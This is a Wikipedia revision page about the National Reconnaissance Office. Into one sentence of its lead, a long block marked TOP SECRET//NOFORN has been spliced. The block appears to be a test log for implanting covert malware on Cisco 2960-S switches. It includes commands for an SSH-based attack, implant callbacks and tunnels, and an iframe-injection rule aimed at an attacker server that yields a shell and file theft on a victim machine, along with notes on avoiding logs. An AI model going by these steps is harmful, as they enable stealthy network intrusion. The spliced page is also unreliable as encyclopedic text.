National Reconnaissance Office: Difference between revisions

National Reconnaissance Office
	; NRO headquarters at night
Agency overview
Formed	Established: September 6, 1961 Declassified: September 18, 1992
Jurisdiction	United States
Headquarters	Chantilly, Virginia, U.S.
Motto	Supra Et Ultra; (Above And Beyond)
Agency executives	Betty J. Sapp, Director of the National Reconnaissance Office (DNRO); Susan S. Gibson, Inspector General; Frank Calvelli, Principal Deputy Director of the NRO (PDDNRO); Maj. General Stephen T. Denker, Deputy Director of the NRO (DDNRO);
Parent agency	Department of Defense
Website	www.nro.gov

Browse history interactively

← Previous edit Next edit →

Content deleted Content added

VisualWikitext

Inline

Revision as of 09:13, 8 March 2017

The National Reconnaissance Office (NRO) is a member of the United States Intelligence Community and an agency of the United States Department of Defense. NRO is considered, along with the Central Intelligence Agency (CIA), National Security Agency (NSA), Defense Intelligence Agency (DIA), and National Geospatial-Intelligence Agency (NGA), to be one of the "big five" U.S. intelligence agencies.^[2] The NRO is headquartered in unincorporated Fairfax County, Virginia,^[3] 2 miles (3.2 km) south of Washington Dulles International Airport.

It designs, builds, and operates the Reconnaissance satellites of the United States government, and provides satellite intelligence to several government agencies, particularly signals intelligence (SIGINT) to the NSA, imagery intelligence (IMINT) to the NGA, and measurement and signature intelligence (MASINT) to the DIA.^[4]

The Director of the NRO reports to both the Director of National Intelligence and the Secretary of Defense^[5] and serves as Assistant Secretary of the Air Force (Intelligence Space Technology). The NRO's federal workforce consists primarily of Air Force, CIA, NGA, NSA, and Navy personnel.^[6] A 1996 bipartisan commission report described the NRO as having by far the largest budget of any intelligence agency, and "virtually no federal workforce", accomplishing most of its work through ". TOP SECRET//NORFORN

3/4/2015 - User #75335

Followed README instructions to trigger HG. Opened and setup Listening window first, then followed steps to open and setup Trigger window. When I entered ./prep-ct.sh in the Trigger window, got the following message in the Listening window:

Bus error (core dumped) - spoke with User #75338/Xetron about this. He says this is because ./prep-ct.sh is only meant to be run once. It is in the README to run twice because the README assumes you are not triggering and listening on the same VM.

3/6/2015 - User #75335

Was trying different things with the Seeds host to get HG to call back without an explicit IP to impersonate. I edited the ifcfg-eth1 file on Seeds to remove the DOMAIN variable and then saved my changes to the file. Then I restarted network services on the Seeds host so my changes would take effect. Noticed that I could no longer ping the default gateway from the Seeds host. Logged into network gear to verifiy connections and found 3750G g1/0/11 in err-disable state with syslog message %ETHCTR-3-LOOP_BACK_DETECTED: Loopback detected on Gi1/0/11, putting Gi1/0/11 in err-disable state. I bounced the port to restore and it came up/up. I also check the TOR-SW-1 and found g1/0/3 in the same state. Bounced port to restore. Went back to ICON VM to attempt to trigger again and now Trigger packets are not successful, where they were before. Ran tcpdump on the Seeds host that is the destination for the trigger packet and it actually does receive the trigger packet. HG is no longer picking up the trigger packet. Reloaded 2960S to reinstall HG, and without HG installed, ports no longer to into err-disable state when I issue service network restart on Seeds. Successfully re-attacked with HG and still do not see the err-disable issue.

Testing Notes Summary

SMITE filter rule traffic visible in debug messages if debug platform cpu-queue sw-fwd-q enabled HG accepts multiple mitm http_iframe filter rules for same traffic, but only lowest numbered rule injects iframe HG mitm injects Iframe after each <body> tag in the HTML, we saw multple iframes injected because our HTML has two <body> tags After SSHIAC attack, two new processes in show stacks - Xetron aware of SSH process, need to verify platform OBFL process When HG installed, output of show stacks does not show Init process - Xetron already aware After HG uninstalled, output of show stacks has many blank lines as well as a new IP input process - Xetron already aware HG visible in show controllers output, sw-forwarding counter incrementing - Xetron already aware HG visible in Used/Free memory when it is installed - Xetron already aware Observed the following EC (not in readme) during SSHIAC attack - EC 159 and EC 60 - Xetron confirmed these are benign and are related to GDB session closing CPU spikes observed during SSHIAC attack, HG install and HG SSL Handshake - known issue, could verify levels of spike Encountered an issue with ports on switches connected to target 2960S switch (while HG installed) changing state to err-disable - current testing indicates that this occurs when HG is installed, but there is no cutthroat session active and service network restart is issued on Fedora10 Seeds host.

Progress / Notes TR team has performed initial review of configuration and Ops provided diagrams TR team is moving required VMs at this time Created Blot-Proxy, Blot-Onslaught, Blot-CoverWeb, ICON-CutThroat VMs. Copied Fedora10-hg2960-Seeds VM from NDB Lab to use for seed traffic. Built test network with 2960S-24TS-L target switch, 3750G-24T Router and 3 2960-24TT-L switches. Upgraded IOS on target 2960S switch to c2960s-universalk9-mz.122-55.SE7.bin. Updated confiugration to match config obtained from COG. Uploaded Aquaman delivery package to ICON-CutThroat VM and installed in /home/ubuntu. Successfully attacked target 2960S switch with SSHIAC and installed Hun-Grrr. Note: On ICON-CutThroat VM - had to move to Devlan temporarily to download the ia32-lib from the repo in order for SSHIAC to run Must enable the root account and su - root in each window you use when you attack with SSHIAC and use CutThroat Modified Seeds scripts on Fedora10-hg2960-Seeds VM to generate ICMP/ARP, DNS and HTTP traffic in our test network. Established comms between Hun-Grrr and ICON-Cuthroat VM. Used beacon get_current_trigger_number and beacon set_current_trigger_number to make sure HG trigger sequence number was correct Had successful trigger packets however did not receive a callback User #75337/Xteron recommended to use beacon call_me_back https 443 -ii 172.31.255.2 and then finally comms came up, successful SSL handshake in listening window. Created new WebServer VM to use as web destination for seed traffic - 172.20.13.25. Created new BIND DNS server VM to resolve WebServer domain. New BIND server has google.com, cnn.com and blot.com zones. IXIA added to the topology for traffic generation. Port 11 on IXIA to 0/1 on 3750 and IXIA Port 20 to 2960S 1/0/24 Spoke with Operator and discussed network topology and CONOP. We will need to update our testbed architecture to more closely match operational network. Installed Flux on FluxHost VM Copied Windex and Windex Target VMs to Test Range from NDB lab for use in SMITE testing Re-configured topology based on latest 2960 configs from Operator. Fixed issue with Seeds traffic - added second DNS server and moved both DNS servers and Web server into public IP space. HG comms now established without specifying a host to impersonate. Successfully tested HG SMITE functionality using Windex-Victim-WinXPProSP3 (192.168.21.11), Windex (X.X.X.XX (LVLT-GOGL-8-8-8[US])), and our WebServer (X.X.X.XX (LVLT-GOGL-8-8-8[US])). User #75333/Xetron recommends always using the -bc and -bk flags when creating the mitm rule. This bypasses compression and chunking, and SMITE did not work in our test scenario without these flags. User #75336/Xetron noted that the iframe is injected after the <body> tag, and if the body tag is split into two packets, HG will not add the iframe mitm create http_iframe 192.168.21.11 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk Installed 12.2(50)SE5 on 2960#3 for use in testing Tunnel Copied RANCID VM from NDB Lab up to TestRange and configured for use on JQJTHRESHER testing Reviewed Test Plan with team Discussed CONOP of use of Flux with Dualor Tunnel with Operator Implanted 2960#3 with aquaman-3h survey delivery of HG and established comms from ICON-CT. Completed the following Smoke Tests against the target 2960-S: Attack with SSHIAC SSHIAC produced the following out on CutThroat during install - LG EC-125 DH EC-60 EC-159 M Five second CPU on Target 2960-S hit 66% as a high during the SSHIAC attack, One minute - 22%, Five minute - 11% No commands seen in history No syslog messages generated Memory used increased by ~50k Installed HG - Aquaman-5h Installed with no delay set between packets Five second CPU hit 25% during install - note this is with 0 delay between packets Memory used increased by 2.8M after install from baseline No syslog messages generated Establish Comms with ICON-CT Five second CPU hit 19% during SSL Handshake with ICON-CT No significant change to memory used (~1k) SMITE capability Successfully injected an Iframe into a web request and established a shell term connection with Windex Filter applied: mitm create http_iframe 192.168.21.11 255.255.255.0 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk Note that -bc and -bk flags aree recommended by User #75339/Xetron for standard use because they offer the best chance of success. These flags will bypass compression and chunking, and in fact SMITE does not work in our test environment without these flags configured. Five second CPU did not change from baseline - no noticeable spike No syslog messages generated. Took two screenshots - one of windex shellterm connection and one of victim source code showing Iframe for Test Report CI Test Used RANCID to compare configuration of Target 2960-S before any testing and configuration after previous smoke tests completed - RANCID found no change There were CPU spikes during SSHIAC and HG install, however these are known. Need to confirm our CPU spikes are within expected levels. There was a change in the memory used after HG install, need to confirm if this is expected and within norms. Need to eyeball the output from show-tech from before and after to look for any anamolies - found output from show controllers - line sw forwarding is 0 untile HG installed, at which point it begins incrementing additional things to track down from sh tech - exec process, remote command vtp, show stacks - difference in processes listed Found no change to files or file sizes on file system Note that there is no "test platform debugger dumpmem" command available on this 2960-S. Based on PW's Kingpin test report, this is the only IOS (except ROMMON commands) that will allow inspection of HG memory. Time permitting could perform additional hidden commands Completed the following Performance Tests against the target 2960-S Used IXIA Breaking Point to generate traffic and establish a baseline performance for the 2960-S. IXIA cabled to 2960-S (g1/0/24) on one side and 3750G (g1/01/) on the other. Traffic configured as follows: AppSim test component with BreakingPoint-Enterprise traffic profile Maximum bandwidth 75Mbps (while IXIA connects to Gigabit ports, the link between the IXIA and the 3750G is FastEthernet) 20 simulated hosts on 192.168.0.0/25 (VLAN 1) 50 simulated hosts on 192.168.21.0/24 (VLAN 21) During a 1 hour Baseline test without HG installed, target 2960-S one minute and five minute CPU Utilization remained steady at 6%. Five second CPU had small spikes with a maximum of 39%. During 30 minute Performance test with HG installed, target 2960-S CPU recorded higher results than the baseline without HG: During SSHIAC attack, five second CPU had spikes to 57% and 54% for two minutes in row during SSHIAC attack, and one minute CPU was observed as high as 21% on show proc cpu sorted, and shows 30% on a show proc cpu history During HG install, five second CPU spiked to 28% During HG SSL handshake with ICON-CT, five second CPU spiked to 18% Once HG was installed and comms established, CPU levels returned to what was observed during Baseline performance test without HG - one minute and five minute CPU levels at 6%, largest value for five second CPU was 9%. No significant change to CPU observed from Baseline during successful SMITE attack - largest five second CPU spike observed was 9%. Samsonite Test Case - Uninstall HG and re-attack Reloaded 2960-S to start with a clean target device Attacked with SSHIAC, installed HG and established comms Attempted uninstall hg command device uninstall_hg - this command fails with error that says you must use -f flag Attempted uninstall hg command device uninstall_hg -f - then typed yes to confirm, result success. Checked used memory on the target 2960-S and the memory has gone back to down normal level without HG installed (may be slight difference, need to do the math), no syslog messages, no CPU spike Re-attacked using SSHIAC, installed HG, established HG comms - no anomalies Uninstalled HG again using device uninstall_hg -f - no anomalies No syslogs Used memory back to normal - could check math to find a small difference Samsonite Test Case - Dropped connection during HG install Reloaded 2960-S to start with a clean target device Added 1 second of delay to HG upload in remote configuration file Attacked with SSHIAC Entered hg_start and after just a few chunks were sent, shut int g1/0/11 via console connection on 2960-S to simulate network outage ICON-CT reported HG install failed No syslog messages from switch Used memory still shows higher than it should, but not as high as if HG were installed - 27265180 (b) Issued no shut on 2960-S interface g1/0/11 to re-enable the connection Entered hg_start on ICON-CT and HG successfully uploaded - used memory after successful install - 29607324 (b) Samsonite Test Case - Attempt to install HG when HG already installed Cannot initiate hg_start again via remote - reports comms failure Attempted to re-attack with SSHIAC - seemed to go through normal SSHIAC install process, however at the end of the install, could not establish comms with remote Broad didn't work hg_start fails Attempted to re-establish HG comms and that was successful Samsonite Test Case - Enable MITM rule and execute system administrator commands Enabled the SMITE MITM rule used above in HG Performed the following with no anomalies observed Cleared log buffer Disable/re-enable logging Multiple show commands - mac-address table, memory, proc cpu, proc cpu hist, log,run Write mem Add/delete a user Add/delete a VLAN Verified that SMITE works by web browsing from Victim VM - collected output from Wireshark running on Victim VM which shows Iframe Samsonite Test Case - Issue Cisco "test crash" command to test crash and generate a crashinfo With HG installed, issued test crash and selected reason as software forced crash Saved output of crashinfo file Saved log messages seen upon reboot of switch in log buffer Memory used had returned to normal levels for no HG, controller counters for sw forwarding back to 0 Re-attacked with SSHIAC and installed HG and established HG comms successfully after test crash - with 1 second delay the five second CPU during HG install spiked to a max of 19% Without HG installed, repeated test crash - need to compare crashinfo Reloaded 2960-S to remove HG Issued "test crash" command with software forced crash as reason Saved output of crashinfo file Saved syslog messages seen up reboot of switch in log buffer - log messages are the same as seen on test crash with HG Samsonite Test Case - Perform core dump of 2960-S Performed a write core and saved to TFTP server - both before and after HG install. Need to compare these files Trigger and Callback through a HG Tunnel running Aquaman-3h on 2960 Updated 2960#1 to 12.2(50)SE5 and implanted with Aquaman-3h delivery of HG Established comms with Aquaman-3h from ICON-CT on port 443 Disabled setting in Aquaman-3h HG tunnel which will disable the tunnel if the tap IP becomes active Edit hg/config/tunnel.ini and change DetectTAPSrcTraffic=Yes to No From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg and note output and DetectTAPSrcTraffic = Yes From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg tunnel.ini and note in the output that DetectTAPSrcTraffic has been changed to No From hg/config run ./config-tunnel ../cfs/000000004B8FAF63.cfg and note output and DetectTAPSrcTraffic = No From Aquaman-3h CutThroat, type file put cfs/000000004B8FAF63.cfg default:000000004B8FAF63.cfg in order to load the new setting up to HG From Aquaman-3h CutThroat, type module restart default:CovertTunnel.mod to restart the module This did not work initially and Xetron is aware of this problem. To fix, try restarting again, and run ilm refresh. Establish Dualor tunnel with tap IP 192.168.0.110 From /hg/tools/dualor/linux, run ./Dualor .../configs/dualor-endpoint.ini and note that you get a message that CT is listening on port 444 From Aquaman-3h CutThroat, run tun init tools/dualor/config/dualor-callback.ini and note that the SSL session establishes Note that on ICON-CT VM you know have a new interface called tap0 with an iP 192.168.0.110 Add a route to ICON-CT for 192.168.21.0/24 to use tap0 interface - route add -net 192.168.21.0/24 dev tap0 Move to Aquaman-5h setup - Edit aquaman-5h.txt Interface value under general settings to tap0, and set CommsH port to 445 Establish HG comms using "beacon call_base_back https 192.168.0.110 445" Comms successfully established through Aquaman-3h tunnel Configured mitm rule for SMITE as in tests above and successfully exploited Victim VM and read secrets.txt from Windex Samsonite Test Case - Create MITM rule for SMITE multiple times Created the MITM rule twice in a row - command successful both times and two identical rules present in mitm show output Created a third identical MITM rule - now there are three identical MITM rules Iframe injection on Victim VM successful - only 1 Iframe injected Deleted the two additional rules and added a rule with same filter settings except different iframe string - only one iframe injected and it is for lowest numbered rule Deleted the lowest numbered rule so now only 1 rule applied - iframe is injected that matches remaining rule Noticed that in our test setup HTML we have two body tags, and we actually get two iframes injected - one after each body tag, which results in two shellterm connection ids in Windex When multiple MITM rules are present for the same traffic, lowest numbered rule is the action performed Samsonite Test Case - Reload FilterBroker.mod while mitm rule enabled Created a mitm rule and verified functionality by viewing source on the Victim VM On CutThroat session, entered module restart default:FilterBroker.mod Issued module show and saw two copies running - one status ModuleStopped, one status ModuleRunning Issued ilm refresh to attempt to clear the old copy of FilterBroker - however two copies still present in module show Ran mitm show and found no rules - restarting the module had deleted our rule Re-added a mitm rule and verified functionality by checking for the Iframe on Victim VM Checked module show and found that now, only one copy - status ModuleRunning - is present Installed new 2960-S with PoE Smoke Test - Install Aquaman-5h on PoE 2960-S Attack 2960-S with SSHIAC Five second CPU hit 58% during SSHIAC Observed same error codes in SSHIAC output as with non PoE 2960-S Install HG on 2960-S Five second CPU hit 26% during HG install No commands seen in history No syslog messages generated Used memory increased as expected Establish comms with ICON-CT Five second CPU spiked to 19% during SSL handshake Successfully established HG comms Smoke Test - Trigger and Callback through a HG Tunnel running Aquaman-3h on 2960 (2960-S with PoE) Establish Dualor tunnel with tap IP 192.168.0.100 From /hg/tools/dualor/linux, run ./Dualor .../configs/dualor-endpoint.ini and note that you get a message that CT is listening on port 444 From Aquaman-3h CutThroat, run tun init tools/dualor/config/dualor-callback.ini and note that the SSL session establishes Note that on ICON-CT VM you know have a new interface called tap0 with an iP 192.168.0.110 Add a route to ICON-CT for 192.168.21.0/24 to use tap0 interface - route add -net 192.168.21.0/24 dev tap0 Move to Aquaman-5h setup - Edit aquaman-5h.txt Interface value under general settings to tap0, and set CommsH port to 445 Establish HG comms using "beacon call_base_back https 192.168.0.110 445" Comms successfully established through Aquaman-3h tunnel Configured mitm rule for SMITE as in tests above and successfully exploited Victim VM and read secrets.txt from Windex Observation - we have two <body> tags in our HTML on our web server for google.com. When SMITE injects an iframe, we actually get two iframes inserted, once after each body tag. This does not appear to cause any issues however we do get two session ids in shellterm. Samsonite Test - Reload 2960-S during HG install Reloaded target 2960-S to start with a clean target device Attacked with SSHIAC Set remote interpacket delay to 1s to allow me to time the reload halfway through HG install Initiated HG install and reloaded the switch at the 50% User #75334 Did not see any unusual syslog messages, switch boots normally Remote reports "FAILED retry (yes/up/down/fail)? Selected fail and remote gives a Traceback and exits Re-attack with IAC - successful and looks normal Initiated HG install and allow installation to complete - Installation successful Established HG comms successfully Samsonite Test Case - Debug all With HG installed from previous test, entered debug all just to see what would happen and lost all ability to HG comms with switch, interact on vty or console. Collected a bunch of output and then hard reset. Had to kill CT listen window because HG prompt would not return in order to gracefully exit with quit command. Got a bunch of unusual error messages on the console when the switch came back up. Need to investigate these and see if these messages appear without HG. After switch reloaded, output of show debug showed persistent variable debugging is currently set to All. Not sure why that would be since the switch just reloaded and all other debugging was off. Entered undebug all to disable it. Repeating the debug all and hard reset, this time without HG and the results are the same - persistent variable debugging is set to on when switch reboots. Need to compare output of error messages. Samsonite Test Case - CI - SMITE with Cisco debug platform cpu-queue sw-fwd-q set to on Enable debug on Cisco, but do not enable SMITE rule and then web browse from SMITE victim - Note that no debug output is seen on console of 2960-S Now enable SMITE rule and then web browse from SMITE victim - Note output on console of 2960-S

Mar 1 00:57:33: SW-FWD-Q:IP packet: Local Port Fwding L3If:Vlan1 L2If:GigabitEthernet1/0/6 DI:0x1E9, LT:7, Vlan:1 SrcGPN:6, SrcGID:6, ACLLogIdx:0x0, MacDA:0011.bb89.21c4, MacSA: 0050.5688.40eb IP_SA:192.168.21.11 IP_DA:X.X.X.XX (LVLT-GOGL-8-8-8[US]) IP_Proto:6

TPFFD:DAC00006_00010001_01A00131-000001E9_276B0000_00000000

CI Smoke Test After IAC attack, output of show stacks shows New SSH process New Platform OBFL process After HG install, output of show stacks still includes the two new processes, but now missing Init process - called Xetron, this is tracked under EAR 5163 After HG comms established, output of show stacks command looks identical as after HG install After running SMITE against Victim VM, output of show stacks shows no change After uninstall of HG Init process returned New IP input process present New Blank process present SSH Process still present (since IAC attack) Platform OBFL still present (since IAC attack) Bunch of blank lines, then \Vx~ - Called Xetron, this is tracked under EAR 5012 CI Smoke Test - Output of show chunk Reloaded target 2960-S to start with a clean target device Collected show chunk output before any attack, after hg install and after hg uninstall Noticed different number of sibling processes but that looks like it changes regularly with normal operations Names of processes are the same Attempt to reproduce err-disable state On seeds host, modified the ARP Seeds script to also ping and arp to 172.20.12.22 (ICON-CT) Installed HG on 2960S On seeds host, edited ifcfg-eth1 to remove DOMAIN variable Entered service network restart - ports changed to err-disable on TOR-SW-1 and 2960#1 Reproducible with one or two service network restarts - every time, ports go err-disable Reload 2960S to remove HG Entered service network restart on Seeds multiple times - no err-disable condition Edited ifcfg-eth1 to add DOMAIN variable, service network restart multiple times - no err-disable condition Edited ifcfg-eth1 to remove DOMAIN varibale, service network restart multiple times - no err-disable condition Put HG back on and did service network restart on Seeds- err-disable condition occurs Fixed err-disable condition by shut/no shut and then tried disable/enable LAN3 on Windows XP Victim - no err-disable condition Went back to Seeds (Fedora10) and entered service network restart - err-disable Shut seeds traffic off and entered service network restart on Seeds - err-disable Reload 2960S to remove HG, shut no shut on all the err-disable ports to fix, leaving Seeds traffic shut off to see if that will prevent the condition from occurring Did service network restart multiple times on Seeds, added and removed the DOMAIN variable with service network restart after each edit - could not recreate err-disable condition. During all this, no seeds traffic running. Put HG back on switch Entered service network restart - on the first time, no problem, entered it twice and the err-disable condition happened Put an Ubuntu VM on the same VLAN with same IP address and entered service network restart multiple times and rebooted the host - no err-disable Put Seeds VM back in place - and err-disable condition is present after editing ifcfg-eth1 to include a DOMAIN variable, then removing it. After that, service network restart triggers the err-disable condition Reloading 2960-S to try again to reproduce without HG Entered service network restart multiple times and edited the DOMAIN variable and did another service network restart - could not reproduce Installed HG - was able to reproduce Established comms with HG - could not reproduce Quit the comms session with HG and could reproduce again User #75331/Xetron called to ask for a wireshark capture (inline preferred but span if that's all we have) of the problem ocurring and also a capture of the same steps with the Ubuntu host in place User #75332/Xetron also walked me through disabling snooping (web, dns, https) on HG. He said normally, once a CT session is estalished, hg turns off snooping, so that is a difference. https change_snoop offcyle 1d https show to verify snoop setting repeat for web and dns Once snooping disabled, closed CT session and attemped to reproduce - could not, with multiple service network restarts and editing ifcfg file In order to narrow down which snoop service could be associated with the err-disable state, reloading HG fresh and disabling two of the three, and then testing Test 1 - leave only dns snooping enabled, then disconnected comms - was able to reproduce error after several service network restarts Test 2 - reload and start over, leaving only https snooping enabled and disconnect comms - was able to reproduce error after several service network restarts Test 3 - reload and start over, leaving only web snooping enabled and disconnect comms - was able to reproduce after one service network restart Captured Wiresharks for Xetron One shows err-disable on first try One shows err-disable on third try One shows no HG, and 10 service network restarts with no err-disable One shows Ubuntu14Server in place of Seeds host, with HG, and 10 service network restarts with no err-disable TOP SECRET//NOFORN

 " of defense contractor personnel.^[7]

Mission

The National Reconnaissance Office (NRO) develops and operates space reconnaissance systems and conducts intelligence-related activities for U.S. national security.^[8]

It also coordinates collection and analysis of information from airplane and satellite reconnaissance by the military services and the Central Intelligence Agency.^[9] It is funded through the National Reconnaissance Program, which is part of the National Intelligence Program (formerly known as the National Foreign Intelligence Program). The agency is part of the Department of Defense.

The NRO works closely with its intelligence and space partners, which include the National Security Agency (NSA), the National Geospatial-Intelligence Agency (NGA), the Central Intelligence Agency (CIA), the Defense Intelligence Agency (DIA), the United States Strategic Command, Naval Research Laboratory and other agencies and organizations.

It has been proposed that the NRO share imagery of the United States itself with the National Applications Office for domestic law enforcement.^[10] The NRO operates ground stations around the world that collect and distribute intelligence gathered from reconnaissance satellites.

According to Asia Times Online, one important mission of NRO satellites is the tracking of non-US submarines on patrol or on training missions in the world's oceans and seas.^[11]

History

Close-up of Atlas 501 payload fairing with NROL-41 satellite (poster commemorating 50 years of NRO).

Serum and Vaccine Institute in Al-A'amiriya, Iraq, as imaged by a US reconnaissance satellite in November 2002.

The official mission patch from Launch-39 brought attention to the agency in 2013, with a striking resemblance to anti-communism artwork portraying an octopus atop Earth.^[12]

The NRO was established on August 25, 1960, after management problems and insufficient progress with the USAF satellite reconnaissance program (see SAMOS and MIDAS).^[13]^: 23^[14] The formation was based on a 25 August 1960 recommendation to President Dwight D. Eisenhower during a special National Security Council meeting, and the agency was to coordinate the USAF and CIA's (and later the navy and NSA's) reconnaissance activities.^[13]^: 46

The NRO's first photo reconnaissance satellite program was the Corona program,^[15]^: 25–28 the existence of which was declassified February 24, 1995, and which existed from August 1960 to May 1972 (although the first test flight occurred on February 28, 1959). The Corona system used (sometimes multiple) film capsules dropped by satellites, which were recovered mid-air by military craft. The first successful recovery from space (Discoverer XIII) occurred on August 12, 1960, and the first image from space was seen six days later. The first imaging resolution was 8 meters, which was improved to 2 meters. Individual images covered, on average, an area of about 10 by 120 miles (16 by 193 km). The last Corona mission (the 145th), was launched May 25, 1972, and this mission's last images were taken May 31, 1972. From May 1962 to August 1964, the NRO conducted 12 mapping missions as part of the "Argon" system. Only seven were successful.^[15]^: 25–28 In 1963, the NRO conducted a mapping mission using higher resolution imagery, as part of the "Lanyard" program. The Lanyard program flew one successful mission.^{[citation needed]} NRO missions since 1972 are classified, and portions of many earlier programs remain unavailable to the public.

Existence

The first press reports on NRO started in 1971.^[16] The first official acknowledgement of NRO was a Senate committee report in October 1973, which inadvertently exposed the existence of the NRO.^[17] In 1985, a New York Times article revealed details on the operations of the NRO.^[18]

The existence of the NRO was declassified on September 18, 1992, by the Deputy Secretary of Defense, as recommended by the Director of Central Intelligence.^[19]

Funding controversy

A Washington Post article in September 1995 reported that the NRO had quietly hoarded between $1 billion and $1.7 billion in unspent funds without informing the Central Intelligence Agency, the Pentagon, or Congress. The CIA was in the midst of an inquiry into the NRO's funding because of complaints that the agency had spent $300 million of hoarded funds from its classified budget to build a new headquarters building in Chantilly, Virginia, a year earlier.

In total, NRO had accumulated US$3.8 billion (inflation adjusted US$ 7.6 billion in 2024) in forward funding. As a consequence, NRO's three distinct accounting systems were merged.^[20]

The presence of the classified new headquarters was revealed by the Federation of American Scientists who obtained unclassified copies of the blueprints filed with the building permit application. After 9/11 those blueprints were apparently classified. The reports of an NRO slush fund were true. According to former CIA general counsel Jeffrey Smith, who led the investigation: "Our inquiry revealed that the NRO had for years accumulated very substantial amounts as a 'rainy day fund.'"^[21]

Future Imagery Architecture

In 1999 the NRO embarked on a $25 billion^[22] project with Boeing entitled Future Imagery Architecture to create a new generation of imaging satellites. In 2002 the project was far behind schedule and would most likely cost $2 billion to $3 billion more than planned, according to NRO records. The government pressed forward with efforts to complete the project, but after two more years, several more review panels and billions more in expenditures, the project was killed in what the Times report calls "perhaps the most spectacular and expensive failure in the 50-year history of American spy satellite projects."^[23]

9/11

In what the government described as a "bizarre coincidence", the NRO was planning an exercise on September 11, 2001, involving an accidental aircraft "crash" into one of its buildings.^[24] They planned to simulate the "crash" by closing off an area of doors and stairwells in the building to make employees find alternate routes out. This has been cited by 9/11 conspiracy theorists as proof of their beliefs.^[25] During the attacks most of the employees at NRO headquarters were evacuated, save for "essential" personnel.^[24] In charge of the exercise was CIA man John Fulton, head of the NRO's "Strategic War Gaming Division".^[24] [See below.]

Mid 2000s to present

In January 2008, the government announced that a reconnaissance satellite operated by the NRO would make an unplanned and uncontrolled re-entry into the Earth's atmosphere in the next several months. Satellite watching hobbyists said that it was likely the USA-193, built by Lockheed Martin Corporation, which failed shortly after achieving orbit in December 2006.^[26] On February 14, 2008, the Pentagon announced that rather than allowing the satellite to make an uncontrolled re-entry, it would instead be shot down by a missile fired from a Navy cruiser.^[27] The intercept took place on February 21, 2008.^[28]

In July 2008, the NRO declassified the existence of its Synthetic Aperture Radar satellites, citing difficulty in discussing the creation of the Space-Based Radar with the United States Air Force and other entities.^[29]

In August 2009, The Black Vault FOIA archive obtained a copy of the NRO video, "Satellite Reconnaissance: Secret Eyes in Space." ^[30] The 7 minute video chronicles the early days of the NRO and many of its early programs.

At the National Space Symposium in April 2010 NRO director, General Bruce Carlson, USAF (Ret.) announced that till the end of 2011 NRO is embarking on "the most aggressive launch schedule that this organization has undertaken in the last twenty-five years. There are a number of very large and very critical reconnaissance satellites that will go into orbit in the next year to a year and a half."^[31]

In 2012, a McClatchy investigation found that the NRO was possibly breaching ethical and legal boundaries by encouraging its polygraph examiners to extract personal and private information from DoD personnel during polygraph tests that were purported to be limited to counterintelligence issues.^[32] Allegations of abusive polygraph practices were brought forward by former NRO polygraph examiners.^[33] In 2014, an inspector generals' report concluded that NRO failed to report felony admissions of child sexual abuse to law enforcement authorities. NRO obtained these criminal admissions during polygraph testing but never forwarded the information to police. NRO's failure to act in the public interest by reporting child sexual predators was first made public in 2012 by former NRO polygraph examiners.^[34]

Organization

The NRO is part of the Department of Defense. The Director of the NRO is appointed by the Secretary of Defense with the consent of the Director of National Intelligence, without confirmation from Congress. Traditionally, the position was given to either the Under Secretary of the Air Force or the Assistant Secretary of the Air Force for Space, but with the appointment of Donald Kerr as Director of the NRO in July 2005 the position is now independent. The Agency is organized as follows:^[35]

Principal Deputy Director of the NRO (PDDNRO).
- Reports to and coordinates with the DNRO on all NRO activities and handles the daily management of the NRO with decision responsibility as delegated by the DNRO; and,
- In the absence of the Director, acts on behalf of the DNRO.
Deputy Director of the NRO (DDNRO).
- Senior USAF general officer. Represents those civilian/uniformed USAF personnel assigned to the NRO;
- Assists both the DNRO and PDDNRO in the daily direction of the NRO; and,
- Coordinates activities between the USAF and the NRO.
The Corporate Staff. Encompasses all those support functions such as legal, diversity, human resources, security/counter-intelligence, procurement, public affairs, etc. necessary for the day-to-day operation of the NRO and in support of the DNRO, PDNRO, and DDNRO.
Office of Space Launch (OSL).
- Responsible for all aspects of a satellite launch including launch vehicle hardware, launch services integration, mission assurance, operations, transportation, and mission safety; and,
- OSL is NRO's launch representative with industry, the USAF, and NASA.
Advanced Systems and Technology Directorate (AS&T).
- Invents and delivers advanced technologies;
- Develops new sources and methods; and,
- Enables multi-intelligence solutions.
Deputy Director for Business Plans and Operations (BPO).
- Responsible for all financial and, budgetary aspects of NRO programs and operations; and,
- Coordinates all legislative, international, and public affairs communications.
Communications Systems Acquisition Directorate (COMM).
- Supports the NRO by providing communications services through physical and virtual connectivity; and,
- Enables the sharing of mission critical information with mission partners and customers.
Ground Enterprise Directorate (GED).
- Provides an integrated ground system that sends timely information to users worldwide.
Imagery Intelligence Systems Acquisition Directorate (IMINT).
- Responsible for acquiring NRO's technologically advanced imagery collection systems, which provides geospatial intelligence data to the Intelligence Community and the military.
Management Services and Operations (MS&O).
- Provides services such as facilities support, transportation and warehousing, logistics, and other business support, which the NRO needs to operate on a daily basis.
Mission Operations Directorate (MOD).
- Operates, maintains and reports the status of NRO satellites and their associated ground systems;
- Manages the 24-hour NRO Operations Center (NROC) which, working with U.S Strategic Command, provides defensive space control and space protection, monitors satellite flight safety, and provides space situational awareness.
Mission Support Directorate (MSD).
- Engages with users of NRO systems to understand their operational and intelligence problems and provide solutions in collaboration with NRO's mission partners.
Signals Intelligence Systems Acquisition Directorate (SIGINT).
- This directorate builds and deploys NRO's signals intelligence satellite systems that collect communication, electronic, and foreign instrumentation signals intelligence.
Systems Engineering Directorate (SED).
- Provides beginning-to-end systems engineering for all of NRO's systems.

Personnel

In 2007, the NRO described itself as "a hybrid organization consisting of some 3,000 personnel and jointly staffed by members of the armed services, the Central Intelligence Agency and DOD civilian personnel."^[36] Between the 2010 and 2012, the workforce is expected to increase by 100.^[37] The majority of the workers for the NRO are private corporate contractors, with $7 billion out of the agency's $8 billion budget going to private corporations.^[15]^: 178

Budget

